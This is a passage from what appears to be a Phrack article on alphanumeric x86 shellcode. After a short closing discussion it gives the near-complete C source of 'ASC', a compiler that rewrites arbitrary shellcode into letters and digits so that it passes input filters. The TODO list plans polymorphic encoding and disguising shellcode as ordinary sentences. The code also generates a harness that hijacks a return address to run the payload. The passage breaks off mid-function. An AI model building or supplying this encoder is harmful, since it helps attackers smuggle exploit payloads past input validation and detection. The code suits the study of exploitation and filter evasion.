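turns 'a' (POPAD, 0x61) into 'A' (INC ECX, 0x41), which is a completely
different instruction.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/*
 * Count the bytes changed by toupper() (upper != 0) or tolower()
 * (upper == 0) in a code sequence of len bytes.
 */
static size_t count_case_damage(const unsigned char *code, size_t len,
                                int upper)
{
    size_t i, damaged = 0;

    assert(code != NULL);
    for (i = 0; i < len; i++) {
        int converted = upper ? toupper(code[i]) : tolower(code[i]);
        if (converted != code[i]) damaged++;
    }
    return damaged;
}
```

The prefix "LLLLY" survives toupper() but is entirely changed by
tolower(), and a patching instruction such as "0tkb" loses three of its
four bytes under toupper().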


This paper shows that, contrary to received ideas, executable code can
be written and stored nearly everywhere. Never again trust a string
that looks perfectly legal: perhaps it is a well disguised shellcode ;)


Thanks and Hello to (people are alphanumerically ordered :p ):
- Phrack staff.
- Devhell, HERT & TESO guys: particularly analyst, binf, gaius, mayhem,
   klog, kraken & skyper.
- dageshi, eddow, lrz, neuro, nite, obscurer, tsychrana.
                                                              rix@hert.org


----| Code

This should compile fine on any Linux box with "gcc -o asc asc.c".
It is distributed under the terms of the GNU GENERAL PUBLIC LICENSE.
If you have problems or comments, feel free to contact me (rix@hert.org).

<++> asc.c !707307fc
/******************************************************************************
 *                ASC : IA 32 Alphanumeric Shellcode Compiler                 *
 ******************************************************************************
 *
 * VERSION: 0.9.1
 *
 *
 * LAST UPDATE: Fri Jul 27 19:42:08 CEST 2001
 *
 *
 * LICENSE:
 *  ASC - Alphanumeric Shellcode Compiler
 *
 *  Copyright 2000,2001 - rix
 *
 *  All rights reserved.
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions
 *  are met:
 *  1. Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *  2. Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in the
 *     documentation and/or other materials provided with the distribution.
 *
 *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 *  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 *  ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 *  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 *  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 *  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 *  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 *  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 *  SUCH DAMAGE.
 *
 *
 * TODO:
 *  - create LibASC, a library containing all functions.
 *  - permit specification of acceptable non-alphanumeric chars.
 *  - generate padding instructions sequences.
 *  - encode alphanumeric chars, to avoid pattern matching.
 *  - insert junk instructions (polymorphic stuff) and modify existing.
 *  - optimize "patch technique" when offset < 256 and is alphanumeric.
 *  - automatically calculate padding size for "stack without jump" technique.
 *  - C output format: simulate addresses in register, padding,...
 *  - use constant address for compiled shellcode.
 *  - modify ESP starting address for "stack technique".
 *  - simple shellcode formats conversion mode (no compilation).
 *  - insert spaces and punctuation to imitate classical sentences.
 *
 *
 * CONTACT: rix <rix@hert.org>
 *
 ******************************************************************************/

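#include <stdio.h>
#include <stdlib.h> /* malloc(), realloc(), free(), rand(), srand() */
#include <ctype.h>  /* toupper() */
#include <getopt.h>
#include <stdarg.h>
#include <string.h>
#include <time.h>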

/* +------------------------------------------------------------------------+ */
/* |                       RANDOM NUMBERS FUNCTIONS                         | */
/* +------------------------------------------------------------------------+ */

/* initialize the pseudo-random numbers generator */
/* ============================================== */
void random_initialize() {
 srand((unsigned int)time(0));
}


/* get a random integer i (0<=i<max) */
/* ================================= */
int random_get_int(int max) {
 return (rand()%max);
}

/* +------------------------------------------------------------------------+ */
/* |                         SHELLCODES FUNCTIONS                           | */
/* +------------------------------------------------------------------------+ */

/* this structure will contain all our shellcodes */
/* ============================================== */
struct Sshellcode {
 unsigned char* opcodes; /* opcodes bytes */
 int size; /* size of the opcodes bytes */
};


/* allocate a new Sshellcode structure */
/* =================================== */
struct Sshellcode *shellcode_malloc() {
 struct Sshellcode *ret;

 if ((ret=(struct Sshellcode*)malloc(sizeof(struct Sshellcode)))!=NULL) {
  ret->opcodes=NULL;
  ret->size=0;
 }
 return ret;
}


/* initialize an existing Sshellcode structure */
/* =========================================== */
void shellcode_zero(struct Sshellcode *shellcode) {
 if (shellcode==NULL) return;

 if (shellcode->opcodes!=NULL) free(shellcode->opcodes);
 shellcode->opcodes=NULL;
 shellcode->size=0;
}


/* free an existing Sshellcode structure */
/* ===================================== */
void shellcode_free(struct Sshellcode *shellcode) {
 if (shellcode!=NULL) {
  shellcode_zero(shellcode);
  free(shellcode);
 }
}


/* return an allocated string from an existing Sshellcode */
/* ====================================================== */
char *shellcode_malloc_string(struct Sshellcode *shellcode) {
 char *ret;

 if (shellcode==NULL) return NULL;

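 if (shellcode->opcodes==NULL) { /* empty shellcode: return an allocated "" (callers free() the result) */
  if ((ret=(char*)malloc(1))!=NULL) ret[0]=0;
  return ret;
 }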

 if ((ret=(char*)malloc(shellcode->size+1))==NULL) return NULL;
 memcpy(ret,shellcode->opcodes,shellcode->size);
 ret[shellcode->size]=0;
 return ret;
}


/* overwrite an existing Sshellcode with a Sshellcode */
/* ================================================== */
struct Sshellcode *shellcode_cpy(struct Sshellcode *destination,struct Sshellcode *source) {
 if (destination==NULL) return NULL;

 shellcode_zero(destination);

 if (source!=NULL) {
  if (source->opcodes!=NULL) { /* if source contains a shellcode, we copy it */
   if ((destination->opcodes=(unsigned char*)malloc(source->size))==NULL) return NULL;
   memcpy(destination->opcodes,source->opcodes,source->size);
   destination->size=source->size;
  }
 }

 return destination;
}


/* append a Sshellcode at the end of an existing Sshellcode */
/* ======================================================== */
struct Sshellcode *shellcode_cat(struct Sshellcode *destination,struct Sshellcode *source) {
 if (destination==NULL) return NULL;

 if (destination->opcodes==NULL) shellcode_cpy(destination,source);
 else { /* destination already contains a shellcode */

  if (source!=NULL) {
   if (source->opcodes!=NULL) { /* if source contains a shellcode, we copy it */

    if ((destination->opcodes=(unsigned char*)realloc(destination->opcodes,destination->size+source->size))==NULL) return NULL;
    memcpy(destination->opcodes+destination->size,source->opcodes,source->size);
    destination->size+=source->size;
   }
  }
 }
 return destination;
}


/* add a byte at the end of an existing Sshellcode */
/* =============================================== */
struct Sshellcode *shellcode_db(struct Sshellcode *destination,unsigned char c) {
 struct Sshellcode *ret,*tmp;

 /* build a tiny one byte Sshellcode */
 if ((tmp=shellcode_malloc())==NULL) return NULL;
 if ((tmp->opcodes=(unsigned char*)malloc(1))==NULL) {
  shellcode_free(tmp); /* do not leak the temporary structure */
  return NULL;
 }
 tmp->opcodes[0]=c;
 tmp->size=1;

 /* copy it at the end of the existing Sshellcode */
 ret=shellcode_cat(destination,tmp);
 shellcode_free(tmp);
 return ret;
}


/* read a Sshellcode from a binary file */
/* ==================================== */
int shellcode_read_binary(struct Sshellcode *shellcode,char *filename) {
 FILE *f;
 int size;

 if (shellcode==NULL) return -1;

 if ((f=fopen(filename,"rb"))==NULL) return -1; /* read-only access is enough */

 fseek(f,0,SEEK_END);
 size=(int)ftell(f);
 fseek(f,0,SEEK_SET);

 if ((shellcode->opcodes=(unsigned char*)realloc(shellcode->opcodes,shellcode->size+size))==NULL) {
  fclose(f); /* close the file on the error path too */
  return -1;
 }
 if (fread(shellcode->opcodes+shellcode->size,size,1,f)!=1) {
  fclose(f); /* close the file on the error path too */
  shellcode_zero(shellcode);
  return -1;
 }
 shellcode->size+=size;
 fclose(f);
 return shellcode->size;
}


/* read a Sshellcode from a C file */
/* =============================== */
#define LINE_SIZE 80*256
#define HEXADECIMALS "0123456789ABCDEF"

int shellcode_read_C(struct Sshellcode *shellcode,char *filename,char *variable) {
 FILE *f;
 struct Sshellcode *binary;
 unsigned char *hex,*p,c;
 int i;

 if (shellcode==NULL) return -1;

 hex=HEXADECIMALS;
 binary=shellcode_malloc();
 if (shellcode_read_binary(binary,filename)==-1) {
  shellcode_free(binary);
  return -1;
 }
 shellcode_db(binary,0); /* for string searching */
 p=binary->opcodes;

  while ((p=(unsigned char*)strstr((char*)p,"char "))!=NULL) { /* "char " found */
  p+=5;
  while (*p==' ') p++;
  if (!variable) { /* if no variable was specified */
   while ((*p!=0)&&(*p!='[')) p++; /* search for the '[' */
   if (*p==0) {
    shellcode_free(binary);
    return -1;
   }
  }
  else { /* a variable was specified */
   if (memcmp(p,variable,strlen(variable))) continue; /* compare the variable */
   p+=strlen(variable);
   if (*p!='[') continue;
  }
  /* *p='[' */
  p++;
  if (*p!=']') continue;
  /* *p=']' */
  p++;
  while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
  if (*p!='=') continue;
  /* *p='=' */
  p++;
  while (1) { /* search for the beginning of a "string" */
   while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;

   while ((*p=='/')&&(*(p+1)=='*')) { /* loop until the beginning of a comment */
    p+=2;
    while ((*p!='*')||(*(p+1)!='/')) p++; /* search for the end of the comment */
    p+=2;
    while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
   }

   if (*p!='"') break; /* if this is the end of all "string" */
   /* *p=begin '"' */
   p++;
   while (*p!='"') { /* loop until the end of the "string" */
    if (*p!='\\') {
     shellcode_db(shellcode,*p);
    }
    else {
     /* *p='\' */
     p++;
     if (*p=='x') {
      /* *p='x' */
      p++;
      c=0; /* stays 0 if a digit is not a valid hexadecimal character */
      *p=toupper(*p);
      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=i<<4; /* first digit */
      p++;
      *p=toupper(*p);
      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=c|i; /* second digit */
      shellcode_db(shellcode,c);
     }  
    }
    p++;
   }
   /* end of a "string" */
   p++;
  }
  /* end of all "string" */
  shellcode_free(binary);
  return shellcode->size;
 }
 shellcode_free(binary);
 return -1;
}


/* write a Sshellcode to a binary file */
/* =================================== */
int shellcode_write_binary(struct Sshellcode *shellcode,char *filename) {
 FILE *f;

 if (shellcode==NULL) return -1;

 if ((f=fopen(filename,"w+b"))==NULL) return -1;

 if (fwrite(shellcode->opcodes,shellcode->size,1,f)!=1) {
  fclose(f); /* close the file on the error path too */
  return -1;
 }
 fclose(f);
 return shellcode->size;
}


/* write a Sshellcode to a C file */
/* ============================== */
int shellcode_write_C(struct Sshellcode *shellcode,char *filename) {
 FILE *f;
 char *tmp;
 int size;

 if (shellcode==NULL) return -1;

 if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;

 if ((f=fopen(filename,"w+b"))==NULL) {
  free(tmp); /* do not leak the string on the error path */
  return -1;
 }

 fprintf(f,"char shellcode[]=\"%s\";\n",tmp);
 free(tmp);
 fprintf(f,"\n");
 fprintf(f,"int main(int argc, char **argv) {\n");
 fprintf(f," int *ret;\n");

 size=1;
 while (shellcode->size*2>size) size*=2;

 fprintf(f," char buffer[%d];\n",size);
 fprintf(f,"\n");
 fprintf(f," strcpy(buffer,shellcode);\n");
 fprintf(f," ret=(int*)&ret+2;\n");
 fprintf(f," (*ret)=(int)buffer;\n");
 fprintf(f,"}\n");

 fclose(f);
 return shellcode->size;
}


/* print a Sshellcode on the screen */
/* ================================ */
int shellcode_print(struct Sshellcode *shellcode) {
 char *tmp;

 if (shellcode==NULL) return -1;

 if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;
 printf("%s",tmp);
 free(tmp);
 return shellcode->size;
}

/* +------------------------------------------------------------------------+ */
/* |                        IA32 MACROS DEFINITIONS                         | */
/* +------------------------------------------------------------------------+ */

/* useful macro definitions */
/* ======================== */
/*
 SYNTAX:
  r=register
  d=dword
  w=word
  b,b1,b2,b3,b4=bytes
  n=integer index
  s=Sshellcode
*/

/* registers */
#define EAX 0
#define EBX 3
#define ECX 1
#define EDX 2
#define ESI 6
#define EDI 7
#define ESP 4
#define EBP 5
#define REGISTERS 8

/* boolean operators (bytes) */
#define XOR(b1,b2) (((b1&~b2)|(~b1&b2))&0xFF)
#define NOT(b) ((~b)&0xFF)

/* type constructors */
#define DWORD(b1,b2,b3,b4) ((b1<<24)|(b2<<16)|(b3<<8)|b4) /* 0xb1b2b3b4 */
#define WORD(b1,b2) ((b1<<8)|b2) /* 0xb1b2 */

/* type extractors  (0=lower 3=higher) */
#define BYTE(d,n) ((d>>(n*8))&0xFF) /* get n(0-3) byte from (d)word d */


/* IA32 alphanumeric instructions definitions */
/* ========================================== */

#define DB(s,b) shellcode_db(s,b);

/* dw b1 b2 */
#define DW(s,w)  \
 DB(s,BYTE(w,0)) \
 DB(s,BYTE(w,1)) \

/* dd b1 b2 b3 b4 */
#define DD(s,d)  \
 DB(s,BYTE(d,0)) \
 DB(s,BYTE(d,1)) \
 DB(s,BYTE(d,2)) \
 DB(s,BYTE(d,3)) \

#define XOR_ECX_DH(s) \
 DB(s,'0')            \
 DB(s,'1')            \

#define XOR_ECX_BH(s) \
 DB(s,'0')            \
 DB(s,'9')            \

#define XOR_ECX_ESI(s) \
 DB(s,'1')             \
 DB(s,'1')             \

#define XOR_ECX_EDI(s) \
 DB(s,'1')             \
 DB(s,'9')             \

/* xor [base+2*index+disp8],r8 */
#define XORsib8(s,base,index,disp8,r8) \
 DB(s,'0')                             \
 DB(s,(01<<6|r8   <<3|4   ))           \
 DB(s,(01<<6|index<<3|base))           \
 DB(s,disp8)                           \

/* xor [base+2*index+disp8],r32 */
#define XORsib32(s,base,index,disp8,r32) \
 DB(s,'1')                               \
 DB(s,(01<<6|r32  <<3|4   ))             \
 DB(s,(01<<6|index<<3|base))             \
 DB(s,disp8)                             \

#define XOR_AL(s,b) \
 DB(s,'4')          \
 DB(s,b)            \

#define XOR_AX(s,w) \
 O16(s)             \
 DB(s,'5')          \
 DW(s,w)            \

#define XOR_EAX(s,d) \
 DB(s,'5')           \
 DD(s,d)             \

#define INCr(s,r) DB(s,('A'-1)|r)
#define DECr(s,r) DB(s,'H'|r)
#define PUSHr(s,r) DB(s,'P'|r)
#define POPr(s,r) DB(s,'X'|r)
#define POPAD(s) DB(s,'a')
#define O16(s) DB(s,'f')

#define PUSHd(s,d) \
 DB(s,'h')         \
 DD(s,d)           \

#define PUSHw(s,w) \
 O16(s)            \
 DB(s,'h')         \
 DW(s,w)           \

#define PUSHb(s,b) \
 DB(s,'j')         \
 DB(s,b)           \

#define INT3(s) \
 DB(s,'\xCC')   \

#define CALL_ESP(s) \
 DB(s,'\xFF')       \
 DB(s,'\xD4')       \

#define JMP_ESP(s) \
 DB(s,'\xFF')      \
 DB(s,'\xE4')      \

#define RET(s) \
 DB(s,'\xC3')  \

/* +------------------------------------------------------------------------+ */
/* |                    ALPHANUMERIC MANIPULATIONS FUNCTIONS                | */
/* +------------------------------------------------------------------------+ */

#define ALPHANUMERIC_BYTES "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

/* return 1 if the byte is alphanumeric */
/* ==================================== */
int alphanumeric_check(unsigned char c) {
 if (c<'0') return 0;
 else if (c<='9') return 1;
 else if (c<'A') return 0;
 else if (c<='Z') return 1;
 else if (c<'a') return 0;
 else if (c<='z') return 1;
 else return 0;
}


/* return a random alphanumeric byte */
/* ================================= */
unsigned char alphanumeric_get_byte() {
 unsigned char *bytes=ALPHANUMERIC_BYTES;

 return bytes[random_get_int(strlen(bytes))];
}


/* return a random alphanumeric byte b (c=CATEGORY_XOR,(b XOR(b XOR c))) */
/* ===================================================================== */
unsigned char alphanumeric_get_complement(unsigned char c) {
 unsigned char ret;

 while (1) {
  ret=alphanumeric_get_byte();
  if (alphanumeric_check(XOR(c,ret))) return ret;
 }
}

/* +------------------------------------------------------------------------+ */
/* |                      REGISTERS MANIPULATIONS FUNCTIONS                 | */
/* +------------------------------------------------------------------------+ */

/* return a random register in a set of allowed registers */
/* ====================================================== */
#define M_EAX (1<<EAX)
#define M_EBX (1<<EBX)
#define M_ECX (1<<ECX)
#define M_EDX (1<<EDX)
#define M_ESI (1<<ESI)
#define M_EDI (1<<EDI)
#define M_ESP (1<<ESP)
#define M_EBP (1<<EBP)
#define M_REGISTERS (M_EAX|M_EBX|M_ECX|M_EDX|M_ESI|M_EDI|M_ESP|M_EBP)

int alphanumeric_get_register(int mask) {
 int regs[REGISTERS];
 int size,i;

 size=0;
 for (i=0;i<REGISTERS;i++) { /* for all possible registers */
  if (mask&(1<<i)) regs[size++]=i; /* add the register if it is in our mask */
 }
 return regs[random_get_int(size)];
}


/* return a "POPable" register (ECX|EDX) with the shellcode's base address using the return address on the stack */
/* ============================================================================================================= */
int alphanumeric_get_address_stack(struct Sshellcode *s) {
 unsigned char ret;

 if (s==NULL) return -1;

 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 ret=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
 POPr(s,ret); /* pop ecx/edx =>pop the return value from the stack */
 return ret;
}


/* initialize registers (reg=shellcode's base address) */
/* =================================================== */
int alphanumeric_initialize_registers(struct Sshellcode *s,unsigned char reg) {
 unsigned char b[4];
 int i;

 if (s==NULL) return -1;

 if (reg==EAX) {
  PUSHr(s,EAX);                                   /* push eax =>address */
  reg=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
  POPr(s,reg);                                    /* pop ecx/edx */
 }
 for (i=0;i<4;i++) b[i]=alphanumeric_get_byte(); /* get a random alphanumeric dword */
 PUSHd(s,DWORD(b[0],b[1],b[2],b[3]));             /* push '????' */
 POPr(s,EAX);                                     /* pop eax */ 
 XOR_EAX(s,DWORD(b[0],b[1],b[2],b[3]));           /* xor eax,'????' =>EAX=0 */
 DECr(s,EAX);                                     /* dec eax  =>EAX=FFFFFFFF */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EAX */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ECX */
 PUSHr(s,EAX);                                    /* push eax =>EDX=FFFFFFFF */
 PUSHr(s,EAX);                                    /* push eax =>EBX=FFFFFFFF */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ESP */
 PUSHr(s,reg);                                    /* push reg =>EBP=address */
 PUSHr(s,EAX);                                    /* push eax =>ESI=FFFFFFFF */
 PUSHr(s,EAX);                                    /* push eax =>EDI=FFFFFFFF */
 POPAD(s);                                        /* popad */
 return 0;
}

/* +------------------------------------------------------------------------+ */
/* |                        STACK MANIPULATIONS FUNCTIONS                   | */
/* +------------------------------------------------------------------------+ */

/* return the category of the byte */
/* =============================== */
#define CATEGORY_NULL 0
#define CATEGORY_00 1
#define CATEGORY_FF 2
#define CATEGORY_ALPHA 3
#define CATEGORY_ALPHA_NOT 4
#define CATEGORY_XOR 5
#define CATEGORY_XOR_NOT 6

int alphanumeric_stack_get_category(unsigned char c) {
 if (c==0) return CATEGORY_00;
 else if (c==0xFF) return CATEGORY_FF;
 else if (alphanumeric_check(c)) return CATEGORY_ALPHA;
 else if (c<0x80) return CATEGORY_XOR;
 else { /* need a NOT */
  c=NOT(c);
  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
  else return CATEGORY_XOR_NOT;
 }
}


/* make a NOT on 1,2,3 or 4 bytes on the stack */
/* =========================================== */
int alphanumeric_stack_generate_not(struct Sshellcode *s,int size) {
 if (s==NULL) return -1;

 PUSHr(s,ESP); /* push esp */
 POPr(s,ECX);  /* pop ecx */

 switch(size) {
 case 1:
  if (alphanumeric_get_register(M_EDX|M_EBX)==EDX) {
   XOR_ECX_DH(s); /* xor [ecx],dh */
  }
  else {
   XOR_ECX_BH(s); /* xor [ecx],bh */
  }
  break;

 case 2:
  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
   O16(s);XOR_ECX_ESI(s); /* xor [ecx],si */
  }
  else {
   O16(s);XOR_ECX_EDI(s); /* xor [ecx],di */
  }
  break;

 case 3:
  DECr(s,ECX);     /* dec ecx =>[ecx] is the dword holding our 3 bytes */
  /* fall through */
 case 4:
  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
   XOR_ECX_ESI(s); /* xor [ecx],esi */
  }
  else {
   XOR_ECX_EDI(s); /* xor [ecx],edi */
  }
  break;
 }
 return 0;
}


/* generate 1,2,3 or 4 bytes from a category on the stack */
/* ====================================================== */
#define SB1 b[size-1]
#define SB2 b[size-2]
#define SB3 b[size-3]
#define SB4 b[size-4]

int alphanumeric_stack_generate_push(struct Sshellcode *s,int category,unsigned char *bytes,int size) {
 int reg,i;
 unsigned char b[4];
 unsigned char xSB1,xSB2,xSB3,xSB4;

 if (s==NULL) return -1;

 memset(b,0,sizeof(b));
 memcpy(b,bytes,size); /* copy only the bytes of this run (size is 1..4) */

 /* possibly realize a NOT on b[] */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  for (i=0;i<size;i++) b[i]=NOT(b[i]);
 }

 /* generate bytes on the stack */
 switch(category) {
 case CATEGORY_00:
 case CATEGORY_FF:
  reg=alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI);
  if (category==CATEGORY_00) INCr(s,reg); /* inc r32 =>r32=0 (it was FFFFFFFF) */
  switch(size) {
  case 1:
   O16(s);PUSHr(s,reg); /* push r16 */
   INCr(s,ESP);         /* inc esp */
   break;
  case 2:
   O16(s);PUSHr(s,reg); /* push r16 */
   break;
  case 3:
   PUSHr(s,reg); /* push r32 */
   INCr(s,ESP);  /* inc esp */
   break;
  case 4:
   PUSHr(s,reg); /* push r32 */
   break;
  }
  if (category==CATEGORY_00) DECr(s,reg); /* dec r32 =>r32=FFFFFFFF again */
  break;

 case CATEGORY_ALPHA:
 case CATEGORY_ALPHA_NOT:
  switch(size) {
  case 1:
   PUSHw(s,WORD(SB1,alphanumeric_get_byte())); /* push SB1 */
   INCr(s,ESP);                                /* inc esp */
   break;
  case 2:
   PUSHw(s,WORD(SB1,SB2)); /* push SB1 SB2 */
   break;
  case 3:
   PUSHd(s,DWORD(SB1,SB2,SB3,alphanumeric_get_byte())); /* push SB1 SB2 SB3 */
   INCr(s,ESP);                                         /* inc esp */
   break;
  case 4:
   PUSHd(s,DWORD(SB1,SB2,SB3,SB4)); /* push SB1 SB2 SB3 SB4 */
   break;
  }
  break;

 case CATEGORY_XOR:
 case CATEGORY_XOR_NOT:
  switch(size) {
  case 1:
   xSB1=alphanumeric_get_complement(SB1);
   PUSHw(s,WORD(XOR(SB1,xSB1),alphanumeric_get_byte())); /* push ~xSB1 */
   O16(s);POPr(s,EAX);                           /* pop ax */
   XOR_AX(s,WORD(xSB1,alphanumeric_get_byte())); /* xor ax,xSB1 =>EAX=SB1 */
   O16(s);PUSHr(s,EAX);                          /* push ax */
   INCr(s,ESP);                                  /* inc esp */
   break;
  case 2:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   PUSHw(s,WORD(XOR(SB1,xSB1),XOR(SB2,xSB2))); /* push ~xSB1 ~xSB2 */
   O16(s);POPr(s,EAX);        /* pop ax */
   XOR_AX(s,WORD(xSB1,xSB2)); /* xor ax,xSB1 xSB2 =>EAX=SB1 SB2 */
   O16(s);PUSHr(s,EAX);       /* push ax */
   break;
  case 3:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   xSB3=alphanumeric_get_complement(SB3);
   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),alphanumeric_get_byte())); /* push ~xSB1 ~xSB2 ~xSB3 */
   POPr(s,EAX);                                              /* pop eax */
   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,alphanumeric_get_byte())); /* xor eax,xSB1 xSB2 xSB3 =>EAX=SB1 SB2 SB3 */
   PUSHr(s,EAX);                                             /* push eax */
   INCr(s,ESP);                                              /* inc esp */
   break;
  case 4:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   xSB3=alphanumeric_get_complement(SB3);
   xSB4=alphanumeric_get_complement(SB4);
   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),XOR(SB4,xSB4))); /* push ~xSB1 ~xSB2 ~xSB3 ~xSB4 */
   POPr(s,EAX);                           /* pop eax */
   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,xSB4)); /* xor eax,xSB1 xSB2 xSB3 xSB4 =>EAX=SB1 SB2 SB3 SB4 */
   PUSHr(s,EAX);                          /* push eax */
   break;
  }
  break;
 }

 /* possibly realize a NOT on the stack */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) alphanumeric_stack_generate_not(s,size);

 return 0;
}


/* generate the original shellcode on the stack */
/* ============================================ */
int alphanumeric_stack_generate(struct Sshellcode *output,struct Sshellcode *input) {
 int category,size,i;

 if (input==NULL) return -1;
 if (output==NULL) return -1;

 i=input->size-1;
 while (i>=0) { /* loop from the right to the left of our original shellcode */
  category=alphanumeric_stack_get_category(input->opcodes[i]);
  size=1; /* by default, we have 1 byte of the same category */

  /* extend the run while the previous bytes share the category (4 bytes max) */
  while ((i-size>=0)&&(size<4)&&(alphanumeric_stack_get_category(input->opcodes[i-size])==category)) size++;

  /* write those bytes on the stack */
  alphanumeric_stack_generate_push(output,category,&input->opcodes[i-size+1],size);

  i-=size;
 }
 return 0;
}

/* +------------------------------------------------------------------------+ */
/* |                       PATCHES MANIPULATIONS FUNCTIONS                  | */
/* +------------------------------------------------------------------------+ */

/* return the category of the byte */
/* =============================== */
int alphanumeric_patches_get_category(unsigned char c) {
 if (alphanumeric_check(c)) return CATEGORY_ALPHA;
 else if (c<0x80) return CATEGORY_XOR;
 else { /* need a NOT */
  c=NOT(c);
  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
  else return CATEGORY_XOR_NOT;
 }
}


/* generate the patches initialization shellcode */
/* ============================================ */
int alphanumeric_patches_generate_initialization(struct Sshellcode *shellcode,int patcher_size,int alpha_begin,int base,unsigned char disp8) {
 struct Sshellcode *s;
 int offset; /* real offset for original shellcode to patch */
 struct Sshellcode *p_offset; /* offset "shellcode" */
 int fill_size; /* size to add to the initialization shellcode to align */
 int initialization_size,i;

 if (shellcode==NULL) return -1;

 initialization_size=0;
 while(1) { /* loop until we create a valid initialization shellcode */
  s=shellcode_malloc();
  fill_size=0;

  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>EAX */
  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ECX */
  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>EDX */
  if (base==EBX) {
   PUSHr(s,EBP);                                    /* push ebp =>EBX */
  }
  else {
   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EBX */
  }
  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ESP */

  offset=shellcode->size+initialization_size+patcher_size+alpha_begin-disp8; /* calculate the real offset */

  /* if the offset is not correct we must modify the size of our initialization shellcode */
  if (offset<0) { /* align to have a positive offset */
   fill_size=-offset;
   offset=0;
  }
  if (offset&1) { /* align for the 2*ebp */
   fill_size++;
   offset++;
  }
  offset/=2;

  p_offset=shellcode_malloc();
  DB(p_offset,BYTE(offset,0));
  DB(p_offset,BYTE(offset,1));
  DB(p_offset,BYTE(offset,2));
  DB(p_offset,BYTE(offset,3));
  alphanumeric_stack_generate(s,p_offset);          /* push offset => EBP */
  shellcode_free(p_offset);

  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>ESI */
  if (base==EDI) {
   PUSHr(s,EBP);                                    /* push ebp =>EDI */
  }
  else {
   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EDI */
  }
  POPAD(s);                                         /* popad */

  if (s->size<=initialization_size) break; /* if the offset is good */

  shellcode_free(s); /* this attempt is too long: free it before retrying */
  initialization_size++;
 }
 /* the offset is good */

 /* fill to reach the initialization_size value */
 while (s->size<initialization_size) INCr(s,ECX);
 /* fill to reach the offset value */
 for (i=0;i<fill_size;i++) INCr(s,ECX);

 shellcode_cat(shellcode,s);
 shellcode_free(s);
 return 0;
}


/* generate the xor patch */
/* ====================== */
#define PB1 bytes[0]
#define PB2 bytes[1]
#define PB3 bytes[2]
#define PB4 bytes[3]

int alphanumeric_patches_generate_xor(struct Sshellcode *s,int category,unsigned char *bytes,int size,int base,char disp8) {
 unsigned char xPB1,xPB2,xPB3,xPB4;
 int reg,i;

 if (s==NULL) return -1;

 /* if needed, apply a NOT to bytes[] */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  for (i=0;i<size;i++) bytes[i]=NOT(bytes[i]);
 }

 /* generate the bytes in the original shellcode */
 switch(category) {
 case CATEGORY_ALPHA:
 case CATEGORY_ALPHA_NOT:
  /* nothing to do */
  break;
 case CATEGORY_XOR:
 case CATEGORY_XOR_NOT:
  reg=alphanumeric_get_register(M_EAX|M_ECX);
